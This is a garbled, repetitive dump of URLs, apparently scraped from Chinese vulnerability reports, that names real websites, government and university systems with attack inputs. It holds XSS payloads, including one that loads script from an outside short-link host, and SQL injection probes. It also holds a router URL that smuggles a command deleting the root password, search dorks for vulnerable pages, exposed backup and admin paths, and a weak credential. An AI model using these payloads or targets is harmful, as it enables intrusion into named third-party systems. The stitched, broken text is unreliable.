http://kjjr.bankcomm.com/dfv/web/index.JSP?id=index%27%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C http://editor.joyslink.com/config.php.bak http://**.**.**/eedswas/www/eeds/jsp/user_center/user_center.jspsystem=0FCAF188F5A32098FADFF5B5ACA1CB8E_ http://tencent.new.ceping.com/AssessmentInfo/ConformInfo?email=t@qq.com&UserInfo={%22tenantId%22:%22104264%22,%22userId%22:%22105735284%22,%22activityId%22:%22170926%22,%22snId%22:%226353545%22,%22sn%22:%221300077545772%22,%22email%22:%22t@qq.com%22 http://tencent.new.ceping.com/AssessmentInfo/ConformInfo?email=t@qq.com&UserInfo={"tenantId":"104264","userId":"105735284","activityId":"170926","snId":"6353545","sn":"1300077545772","email":"t@qq.com http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx android:configChanges="keyboardHidden|navigation|orientation android:hardwareAccelerated="false android:name="com.tencent.server.fore.ComposeSmsActivity android:process=":fore android:windowSoftInputMode="stateHidden|adjustResize android:name="android.intent.action.VIEW android:name="android.intent.category.DEFAULT android:mimeType="vnd.android-dir/mms-sms android:name="android.intent.action.VIEW android:name="android.intent.action.SENDTO android:name="android.intent.category.DEFAULT android:name="android.intent.category.BROWSABLE android:scheme="sms android:scheme="smsto android:name="android.intent.action.SEND android:name="android.intent.category.DEFAULT android:mimeType="text/plain http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://app.gdgs.gov.cn:8888/aicccps/huodong/Support_List.jsp?aicid=440000 http://app.gdgs.gov.cn:8888/aicccps/admin/Support_List.jsp http://app.gdgs.gov.cn:8888/aicccps/admin/Xiehui_Edit.jsp?newID=396cf401-0128-1000-e000-0000c0a8647e http://app.gdgs.gov.cn:8888/aicccps/admin/Xiehui_List.jsp www.sxgfgb.gov.cn/shownews.asp?id=826 http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://store.meizu.com/customer_address/remove_submit http://202.117.122.44/dlib/dir.asp?lang=gb&DocID=2660 http://211.81.174.133:81/dlib/dir.asp?lang=gb&DocID=88607 http://210.37.2.181/dlib/dir.asp?lang=gb&DocID=7278 http://qd.wzlib.cn/dlib/dir.asp?lang=gb&DocID=139163 http://202.103.233.136/dlib/dir.asp?lang=gb&DocID=43036 http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://115.29.241.184:8080 www2.xiren.com.cn http://127.0.0.1/index.php?s=Admin/Master/Update http://127.0.0.1/index.php?s=Admin/Config/Updatedb http://123.234.41.28/ http://123.234.41.28/3.asp;.jpg http://down.chinaz.com/soft/33525.htm inurl:jsxm_detail.asp?id= http://www.veston-gym.com/jsxm_detail.asp?id=36 http://xyhssadmin.gotoip55.com/jsxm_detail.asp?id=34 http://www.mstjs.com/jsxm_detail.asp?id=31 http://jajs.quxint.com/jsxm_detail.asp?id=35 http://www.junyuetj.com/jsxm_detail.asp?id=51 http://58.218.147.146:8080/ http://down.chinaz.com/soft/34007.htm inurl:view_detail.asp?id= http://www.starking128.com/view_detail.asp?id=78 http://www.bjssrd.com/view_detail.asp?id=77 http://szdfzz.cn/view_detail.asp?id=69 http://honghuangsj.com/view_detail.asp?id=82 http://www.11nine.net/view_detail.asp?id=67 http://www.xaymad.com/view_detail.asp?id=82 http://wfhr56.com/view_detail.asp?id=58 http://www.beiyute.com/view_detail.asp?id=59 http://nndya.com/view_detail.asp?id=58 http://nycdgg.com/view_detail.asp?id=58 http://pjchla.com/view_detail.asp?id=98 cn:8080 cn:8088 www.crmshwlzx.com http://m.kadang.com/mobile/wap/user/login/page.htm?redirectURL=http://m.kadang.com/mobile/wap/wuliu/entry.htm http://www.kadang.com/index.php?act=cart&op=address&address_id=&consignee=wooyun&areaid=55&city_id=40&area_info=%E5%A4%A9%E6%B4%A5%09%E5%A4%A9%E6%B4%A5%E5%B8%82%09%E5%92%8C%E5%B9%B3%E5%8C%BA&address=wooyun http://58.56.128.82:8080/haier http://58.56.128.82:8080/haier/downloadfile/client.apk http://www.xwgjzx.com:8888/anmai/Edis/home_school/mentalityconsultationset.aspx?cz=del&id=1 http://www.gxbyzx.cn:88/anmai/Edis/home_school/mentalityconsultationset.aspx?cz=del&id=1 http://jmzx.xmedu.cn:9999/anmai/Edis/home_school/mentalityconsultationset.aspx?cz=del&id=1 http://szxx.pudong-edu.sh.cn/anmai/Edis/home_school/mentalityconsultationset.aspx?cz=del&id=1 http://218.78.241.80/anmai/Edis/home_school/mentalityconsultationset.aspx?cz=del&id=1 http://59.40.183.3:8086/ tw:8080 tw:8080 tw:8086 com:8080 http://210.75.206.8 http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://gw.apabi.com/ http://202.117.24.8/dlib/netlinkhandler.asp?lang=gb&DocGroupID=2&FieldID=3&FieldName=Creator&FieldType=1&QueryValue=%C1%D6%C9%BD&Repeatable=True http://210.37.2.181/dlib/netlinkhandler.asp?lang=gb&DocGroupID=24&FieldID=516&FieldName=Creator&FieldType=1&QueryValue=%BA%A3%C4%CF%B0%AE%C0%D6%C5%AE%D7%D3%BA%CF%B3%AA%CD%C5&Repeatable=False http://202.195.177.13/ebook/netlinkhandler.asp?lang=gb&DocGroupID=2&FieldID=3&FieldName=Creator&FieldType=1&QueryValue=%BA%AB%CC%A9%C2%D7&Repeatable=True http://202.118.250.140/dlib/netlinkhandler.asp?lang=gb&DocGroupID=2&FieldID=3&FieldName=Creator&FieldType=1&QueryValue=%BB%C6%C1%F7%D0%CB%2C+%C5%A3%CA%A4%C0%FB&Repeatable=True http://202.117.122.44/dlib/netlinkhandler.asp?lang=en&DocGroupID=2&FieldID=3&FieldName=Creator&FieldType=1&QueryValue=%C8%CE%D3%F1%CC%EF+...+%5B%B5%C8%5D&Repeatable=1 http://www.jznccq.com/Admin.php/Login.html http://cspro.ccf.org.cn/lead/application/ccf/login.jsp http://ebook.crup.com.cn/search.asp?keywords=%E5%91%A8%E5%9B%BD%E5%B9%B3 http://ebooking.qunar.com/ebPage/login.html http://na2.tjaic.gov.cn/jmx-console/ http://59.173.241.30:8080/ http://59.173.241.30:5678/ http://59.173.241.30:5678/FindCarSystem/ http://59.173.241.30:8090/ImageRecv/whguF_20140903001/KT_ServerSoft/20150321/192.168.50.241/14/ http://120.236.40.117/ http://bbs.bdwsw.zhanchenggame.com http://qzs.qq.com/qzone/qzact/act/hkhd/index.html http://www.xwgjzx.com:8888/anmai/Edis/home_school/sudjectdiscussset.aspx?cz=del&id=1 http://www.gxbyzx.cn:88/anmai/Edis/home_school/sudjectdiscussset.aspx?cz=del&id=1 http://jmzx.xmedu.cn:9999/anmai/Edis/home_school/sudjectdiscussset.aspx?cz=del&id=1 http://szxx.pudong-edu.sh.cn/anmai/Edis/home_school/sudjectdiscussset.aspx?cz=del&id=1 http://218.78.241.80/anmai/Edis/home_school/sudjectdiscussset.aspx?cz=del&id=1 http://www.sxfo.gov.cn/content.aspx?id=1432 http://www.xzqtj.gov.cn/tjnr.asp?id=523 http://www.hcqrs.gov.cn/manage/Admin_Add.aspx http://www.zgws.gov.cn:9090/tm/toLogin.action http://www.shoprobam.com/ http://cdn.wanzhoumo.com,从这个域名访问,php后缀是直接下载不是执行, http://www.rangrang.fm访问马地址就可以成功执行 http://searchmanage.org.hc360.com/ http://miniportal.b2b.hc360.com/marketshield/m/manager/find/)也存在未授权访问漏洞。 http://searchmanage.org.hc360.com/IndexLeft.aspx http://searchmanage.org.hc360.com/User/UserManage.aspx http://miniportal.b2b.hc360.com/marketshield/m/manager/find/ http://120.70.227.17:8080/记得加端口,上面那里不允许加特殊符号没办法 http://123.234.41.28 http://123.234.41.28:80//ashx/check_login.ashx?callback=flightHandler&id=1&_=1426936653601 http://**.**.**/zp/myWorksHome.action_ http://**.**.**/indexzp/queryAllWorks.action_ http://**.**.**/index/index.action_ http://**.**.**/index/xwzxmain.action_ http://**.**.**/zp/verifyList.action_ http://**.**.**/author/albums_alums.action_ http://**.**.**/author/userRegist_registUI.action_ http://**.**.**/user/userCenter_updateInfoUI.action_ http://**.**.**/zp/initAddWorks.action_ http://**.**.**/author/workerDetail.action_ http://**.**.**/index/zxggmain.action_ http://**.**.**/index/xxxsmain.action_ http://**.**.**/index/syhdmain.action_ http://**.**.**/author/userRegist_regist.action_ http://**.**.**/index/syhdDetail.action_ http://**.**.**/author/authorInfo.action_ http://**.**.**/author/authorIndex.action_ http://**.**.**/index/zxggmain.actionchannelId=21_ http://**.**.**/author/authorIndex.actionuserId=1_ http://192.168.11.1/cgi-bin/luci/;stok=换成路由自己的/api/devices/allowConnect?mac=%3Bpasswd%20-d%20root%3B http://www.wapsh.net/website/104417/backup/ http://www.wapsh.net/website/104417/backup/backup.sql_v1.sql http://oa.fangdd.com http://oa.fangdd.com/homepage/LoginHomepage.jsp?hpid=52&isfromportal=1 http://oa.fangdd.com/login/VerifyLogin.jsp?loginfile=http://%77%77%77%2E%62%61%69%64%75%2E%63%6F%6D http://210.40.132.58/A_Major.php?aid=5&op=About&cop=Major http://210.40.132.58/admin/ http://www.sinobook.com.cn/b2c/scrp/bookzx.cfm?sKeyword=300&sFieldName=pno http://hz.zu.loupan.com/tmp/4517803.html http://60.191.106.46/index.jsp http://www.tcl.com/About/social_detail.html?id=247 http://www.tcl.com/About/huameng_detail.html?id=258 http://shianwang.net/wooyun.txt admin:123456 http://hermes.mail.21cn.com/webmail/)允许用户注册任意用户名邮箱,没有屏蔽高危邮箱,可导致任何人向CA申请DV(域名验证)SSL证书。我干的这个事和前几天芬兰人申请微软live.fi域名是一样的[1]。 http://www.myhack58.com/Article/html/1/4/2015/60064.htm https://technet.microsoft.com/en-us/library/security/3046310.aspx http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://gs.njfu.edu.cn/Gmis/xw/xwsb_zyxwEdit.aspx?xh=1 http://202.203.225.17:8080/Gmis/xw/xwsb_zyxwEdit.aspx?xh=1 http://218.75.27.177/Gmis/xw/xwsb_zyxwEdit.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/xwsb_zyxwEdit.aspx?xh=1 http://101.76.99.20/Gmis/xw/xwsb_zyxwEdit.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/xwsb_zyxwEdit.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/xwsb_zyxwEdit.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/xwsb_zyxwEdit.aspx?xh=1 http://211.64.205.214/Gmis/xw/xwsb_zyxwEdit.aspx?xh=1 http://202.203.225.17:8080/Gmis/xw/xwsb_zyxwEdit.aspx?xh=1 http://www.myhack58.com/Article/html/1/4/2015/60064.htm https://technet.microsoft.com/en-us/library/security/3046310.aspx https://www.agwa.name/blog/post/how_to_responsibly_misissue_a_cert http://sss.bnu.edu.cn/viewstaff.php?id=1 http://down.chinaz.com/soft/33525.htm http://xyhssadmin.gotoip55.com/bk_detail.asp?id=58 http://www.mstjs.com/bk_detail.asp?id=64 http://www.junyuetj.com/demo_detail.asp?id=60 http://jajs.quxint.com/demo_detail.asp?id=30 http://www.veston-gym.com/hr_detail.asp?id=16 http://ceoofficer.com/HR_detail.asp?id=1625 http://yhk.wiselong.com:8080/ccbs/ccbs/order/showOrderList.do?method=showOrderDetailJsp&orderId=910835&isStorePage=Y http://moldsale.haier.com/bidadmin/outall.asp?bidID=1 http://moldsale.haier.com/bidadmin/open.asp?id=1 http://moldsale.haier.com/bidadmin/host.asp?id=1 http://moldsale.haier.com/bidadmin/%E5%A4%8D%E4%BB%B6%20outall-ori.asp?bidID=1 http://moldsale.haier.com/bidadmin/%E5%A4%8D%E4%BB%B6%20outall-bad.asp?bidID=1 http://moldsale.haier.com/bidadmin/threepart.asp?bidID=1 http://moldsale.haier.com/bidadmin/outall.asp?bidID=1 http://gs.njfu.edu.cn/Gmis/xw/xwsb_xlssEdit.aspx?xh=1 http://202.203.225.17:8080/Gmis/xw/xwsb_xlssEdit.aspx?xh=1 http://218.75.27.177/Gmis/xw/xwsb_xlssEdit.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/xwsb_xlssEdit.aspx?xh=1 http://101.76.99.20/Gmis/xw/xwsb_xlssEdit.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/xwsb_xlssEdit.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/xwsb_xlssEdit.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/xwsb_xlssEdit.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/xwsb_xlssEdit.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/xwsb_xlssEdit.aspx?xh=1 http://www.app365.com/common/customer.jhtml http://wzjb.app365.com/site56/CustomerService/feedback.jspx http://ydkd.app365.com/site56/CustomerService/feedback.jspx http://www.yonglibao.com/User/Login http://www.yonglibao.com/User http://www.yonglibao.com/User/Index/paypwd http://gs.njfu.edu.cn/Gmis/xw/xwsb_tdxlssEdit.aspx?xh=1 http://202.203.225.17:8080/Gmis/xw/xwsb_tdxlssEdit.aspx?xh=1 http://218.75.27.177/Gmis/xw/xwsb_tdxlssEdit.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/xwsb_tdxlssEdit.aspx?xh=1 http://101.76.99.20/Gmis/xw/xwsb_tdxlssEdit.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/xwsb_tdxlssEdit.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/xwsb_tdxlssEdit.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/xwsb_tdxlssEdit.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/xwsb_tdxlssEdit.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/xwsb_tdxlssEdit.aspx?xh=1 http://gs.njfu.edu.cn/Gmis/xw/xwsb_gdxxjsEdit.aspx?xh=1 http://202.203.225.17:8080/Gmis/xw/xwsb_gdxxjsEdit.aspx?xh=1 http://218.75.27.177/Gmis/xw/xwsb_gdxxjsEdit.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/xwsb_gdxxjsEdit.aspx?xh=1 http://101.76.99.20/Gmis/xw/xwsb_gdxxjsEdit.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/xwsb_gdxxjsEdit.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/xwsb_gdxxjsEdit.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/xwsb_gdxxjsEdit.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/xwsb_gdxxjsEdit.aspx?xh=1 http://gs.njfu.edu.cn/Gmis/xw/xwsb_tdxlbsEdit.aspx?xh=1 http://202.203.225.17:8080/Gmis/xw/xwsb_tdxlbsEdit.aspx?xh=1 http://218.75.27.177/Gmis/xw/xwsb_tdxlbsEdit.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/xwsb_tdxlbsEdit.aspx?xh=1 http://101.76.99.20/Gmis/xw/xwsb_tdxlbsEdit.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/xwsb_tdxlbsEdit.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/xwsb_tdxlbsEdit.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/xwsb_tdxlbsEdit.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/xwsb_tdxlbsEdit.aspx?xh=1 http://op.bitauto.com/ems/sharepages/mytask.aspx?name= http://op.bitauto.com/ems/SharePages/ProjectList.aspx?state=1&CategoryId=6 http://op.bitauto.com/ems/SharePages/plandutylist.aspx http://op.bitauto.com/ems/sharepages/mytask.aspx?name= http://op.bitauto.com/ems/sharepages/mytask.aspx?name= http://op.bitauto.com/ems/sharepages/mytask.aspx?name= http://bidding.ztesoft.com/ http://bidding.ztesoft.com/wordpress/wp-login.php http://gs.njfu.edu.cn/Gmis/xw/xskycgdj.aspx?xh=1 http://202.203.225.17:8080/Gmis/xw/xskycgdj.aspx?xh=1 http://218.75.27.177/Gmis/xw/xskycgdj.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/xskycgdj.aspx?xh=1 http://101.76.99.20/Gmis/xw/xskycgdj.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/xskycgdj.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/xskycgdj.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/xskycgdj.aspx?xh=1 http://211.64.205.214/Gmis/xw/xskycgdj.aspx?xh=1 http://211.64.205.214/Gmis/xw/xskycgdj.aspx?xh=1 http://www.baidu.com/s?wd=科发网上查询系统&ie=utf-8 http://t.cn/RAvVP** http://t.cn/RAvVP** http://218.90.133.218:8099/aIndex.aspx http://www.qzyixiaotong.com/ischool/jsp/article_detail.jsp?articleId=1131 http://www.ztesoft.com/ http://www.ztesoft.com/zsmart/index.php inurl:pubfile.xwl http://www.sfzyzz.cn:6869/file/main?action=webbuilder/application/files/pubfile.xwl http://www.scbss.com/webcontent/main?action=webbuilder/application/files/pubfile.xwl http://zgvtc.com:9999/main?action=webbuilder/application/files/pubfile.xwl http://systems.cdsxdzx.com/file/main?action=webbuilder/application/files/pubfile.xwl http://222.209.208.27:9111/jsxy/main?action=webbuilder/application/files/pubfile.xwl http://117.139.121.134:8088/material/main?action=webbuilder/application/files/pubfile.xwl http://117.139.109.143:8081/main?action=webbuilder/application/files/pubfile.xwl http://118.121.219.7:3312/main?action=webbuilder/application/files/pubfile.xwl http://222.214.237.11:8010/file/main?action=webbuilder/application/files/pubfile.xwl http://218.88.239.59:8088/main?action=webbuilder/application/files/pubfile.xwl http://www.pzhjx.com:8080/main?action=webbuilder/application/files/pubfile.xwl http://www.xbws.com.cn/file/main?action=webbuilder/application/files/pubfile.xwl http://218.89.109.21:8084/myfile/main?action=webbuilder/application/files/pubfile.xwl http://bbs.jeecms.com/ http://218.22.88.62:8089/wsba.aspx http://218.22.88.62:8089/login.aspx http://3c.ecare365.com/ChinaUnicom/Order/Defau http://sms.finereason.com/ http://sms.finereason.com/member/ComSms.asp?tid=1 http://isub.snssdk.com/2/wap/activity/?iid=3309574191&ac=WIFI&channel=App%20Store&app_name=news_article&aid=13&version_code=4.4.4&device_platform=iphone&os_version=7.1.2&device_type=iPhone%205S&vid=8EAA61E1-82A1-4974-8FFE-A3CFFCC97491&openudid=9b907b2e3f957f7c4959a77d9e643fbc22dece64&idfa=1528E03C-0998-4F63-BDB2-1D0F26D4F81F http://isub.snssdk.com/2/wap/activity/admin/ http://x.189.cn:80/kefuwap/broadbandWarning/warningWap.html http://www.gtggjy.com/TSPB/pub_news/Pub_News_InfoViewBeanCTRL http://www.qfztb.gov.cn/TSPB/pub_news/Pub_News_InfoViewBeanCTRL http://www.zjhnztb.com/TSPB/pub_news/Pub_News_InfoViewBeanCTRL http://www.jszbw.com/TSPB/pub_news/Pub_News_InfoViewBeanCTRL http://www.smztb.com.cn/TSPB/pub_news/Pub_News_InfoViewBeanCTRL http://www.jsspzx.gov.cn/TSPB/pub_news/Pub_News_InfoViewBeanCTRL http://www.jxedzsp.gov.cn/TSPB/pub_news/Pub_News_InfoViewBeanCTRL http://122.226.154.126/TSPB/pub_news/Pub_News_InfoViewBeanCTRL http://www.nongyou.com.cn/ http://61.133.119.187:8091/symItemView/ItemFifth.aspx?id=1 http://222.135.76.147:8200/symItemView/ItemFifth.aspx?id=1 http://222.135.127.190:7200/symItemView/ItemFifth.aspx?id=1 http://221.2.149.47:8200/symItemView/ItemFifth.aspx?id=1 http://218.59.205.41:8053/symItemView/ItemFifth.aspx?id=1 http://jwh.tanljgzx.gov.cn/symItemView/ItemFifth.aspx?id=1 http://221.2.171.59:8200/symItemView/ItemFifth.aspx?id=1 http://218.56.159.98:8001/symItemView/ItemFifth.aspx?id=1 http://123.134.189.60:8016/symItemView/ItemFifth.aspx?id=1 http://www.beijing.gov.cn/zhuanti/bjfwn/# http://182.92.82.101/signin http://s.weibo.com/weibo/%22%3E%3Cimg%20src=1%20onerror=appendChild%28createElement%28%27script%27%29%29.src=%27http://t.cn/RAZVK0X%27;%3E%3C/img%3E?topnav=1&wvr=6&b=1 www.muzhiwan.com http://www.muzhiwan.com http://xyz.51job.com/External/Personal/MailReply.aspx?ID=be9a821a-bbb7-4b95-a8dd-04d0ee4455a3&DBID=0975812c-a8ab-4af6-911c-41db25672c90&InboxID=4bd0ff82-8324-41b7-955e-7349a6b4e5b3 http://bbs.union.ijinshan.com/admin.php uckey:Y3W8f8R255I63326J0Pfk3b6s43*******gfv5vd60n0jcq1u7Q2P1N6U6i5 http://117.79.80.22:8082/ http://117.79.80.22:8082/admin-console/login.seam?conversationId=61 http://117.79.80.22:8082/c/index.jsp encap:Ethernet d8:b7:1d:e4 addr:10.8.8.177 Bcast:10.8.8.255 Mask:255.255.255.0 d8ff:feb7:1de4/64 Scope:Link MTU:1500 packets:85872315 packets:37111314 txqueuelen:1000 http://www3.53kf.com/zdy_dbgg2.php?style_id=103458019&company_id=62748324&dbgg_type=2 http://www22.53kf.com/zdy_dbgg2.php?style_id=103766842&company_id=70818335&dbgg_type=2 http://www17.53kf.com/zdy_dbgg2.php?style_id=106052692&company_id=72028138&dbgg_type=2 http://www1.53kf.com/zdy_dbgg2.php?style_id=106080667&company_id=72052732&dbgg_type=2 http://www7.53kf.com/zdy_dbgg2.php?style_id=106081192&company_id=72049384&dbgg_type=2 http://www5.53kf.com/zdy_dbgg2.php?style_id=103534676&company_id=63041455&dbgg_type=1 http://www4.53kf.com/zdy_dbgg2.php?style_id=103610211&company_id=70401575&dbgg_type=2 http://www6.53kf.com/zdy_dbgg2.php?style_id=106059143&company_id=72034014&dbgg_type=2 http://www29.53kf.com/zdy_dbgg2.php?style_id=103697591&company_id=70751158&dbgg_type=2 http://www10.53kf.com/zdy_dbgg2.php?style_id=103555709&company_id=65089675&dbgg_type=2 http://www28.53kf.com/zdy_dbgg2.php?style_id=103818207&company_id=70798983&dbgg_type=1 http://www7.53kf.com/zdy_dbgg2.php?style_id=106081192&company_id=72049384&dbgg_type=2 com.ss.android.essay.zone/com.ss.android.newmedia.downloads.DownloadReceiver http://zzcg.ccgp.gov.cn//zzzc/egp/cm/xxfb/dctp/xinyuanzzvote.jsp?anyone=1 http://bbs.siteserver.cn/ http://bbs.siteserver.cn/ https://59.42.21.101/ http://shop.wapsc.189.cn:80/mobile.php?act=module&name=shopping&do=activityDetail&weid=1&id=5 https://reg.hexun.com/regname.aspx http://i.hexun.com http://12094.mmb.cn/wap/findpassword/sendBandPhoneNum.do http://12094.mmb.cn/wap/findpassword/sendBandPhoneNum.do?findPasswordIndex=1&uuniq=1427032972658239 http://rep.mmb.cn/wap/upload/touch/newWap/css/common.css http://rep.mmb.cn/wap/upload/touch/newWap/css/proList.css http://rep.mmb.cn/wap/upload/touch/newWap/css/usermember.css http://rep.mmb.cn/wap/upload/touch/javascript/jquery-1.7.2.min.js http://rep.mmb.cn/wap/upload/touch/newWap/js/password.js inurl:web_meeting/index.php http://demo.techbridge-inc.com url:http://www.uhuibao.com/*****/.*** http://61.178.185.50/lzweb/webpages/webusercaselist.aspx http://qlgk.taixing.gov.cn/webpages/webusercaselist.aspx http://58.222.216.220/ggweb/webpages/webusercaselist.aspx http://58.222.211.21/webpages/webusercaselist.aspx http://61.178.185.50/wwweb/webpages/webusercaselist.aspx http://qlgk.jingjiang.gov.cn/webpages/webusercaselist.aspx site:qfkd.com.cn http://oa.qfkd.com.cn http://new.lefen.cn/admin.php http://csr.hnagroup.com/ http://csr.hnagroup.com/hna-commonweal/resources/pages/console/user/list.jsp http://csr.hnagroup.com/hna-commonweal/resources/pages/console/role/list.jsp http://csr.hnagroup.com/hna-commonweal/resources/pages/console/privilege/list.jsp http://csr.hnagroup.com/hna-commonweal/resources/pages/console/integral/msg.jsp http://oa.homeinns.com/Voucher/tasks/tasklist.aspx http://citiz.online.sh.cn/cloudmail/)允许用户注册任意用户名邮箱,没有屏蔽高危邮箱,可导致任何人向CA申请DV(域名验证)SSL证书。我干的这个事和前几天芬兰人申请微软live.fi域名是一样的[1]。 http://www.myhack58.com/Article/html/1/4/2015/60064.htm https://technet.microsoft.com/en-us/library/security/3046310.aspx https://www.agwa.name/blog/post/how_to_responsibly_misissue_a_cert http://qywx.homeinns.com/rujia/a/login http://202.96.74.3:8081/loginAction.action http://111.39.70.4:81/wcs/profile/load-login http://zzcg.ccgp.gov.cn//xywwzs/xygh/wwzs/spzs/SpzsController.do?lbbh=359803D9E3F2463FB06738EC7489BFCF&method=showPmxx&pmbh=E9EC84F272428FFCE040007F01006BC6'%20AND%203*2*1%3d6%20AND%20'000Yehy'%3d'000Yehy http://down.chinaz.com/soft/33644.htm inurl:views.asp?hw_id= http://www.163flower.com/guest.asp http://www.cnvolvo.com/guest.asp http://www.led-jiunpey.com/guest.asp http://www.shjyship.com/guest.asp http://www.td-doll.com/guest.asp http://wap.kuwo.cn/wap/js/mkzy.jsp http://weibotest.gfan.com/webop.gfan.com/ http://webop.gfan.com/ http://weibotest.gfan.com/webop.gfan.com/index.php/sys/user/edit http://m.14213066662968.gw.1688.com/companyinfo.htm?spm=0.0.0.0.eOZluE www.nudt.edu.cn http://cs.53kf.com/forgot_passwd.php http://60.28.196.17/resin-admin/status.php http://project.ddmap.com/wgj/wgj_detail.jsp?id=6474&name=%C7%E0%C6%D6%C7%F8%CE%C4%BB%AF%B9%E3%B2%A5%B5%E7%CA%D3%B9%DC%C0%ED%BE%D6 http://project.ddmap.com/wgj/wgj_detail.jsp?id=6474-1%2b1&name=%C7%E0%C6%D6%C7%F8%CE%C4%BB%AF%B9%E3%B2%A5%B5%E7%CA%D3%B9%DC%C0%ED%BE%D6 http://220.181.35.150 http://blog.ifeng.com/index.php?action=album&op=pview&pid=382359 http://blog.ifeng.com/index.php?action=album&op=pview&pid=382359%20and%201=1 http://blog.ifeng.com/index.php?action=album&op=pview&pid=382359%20and%201=2 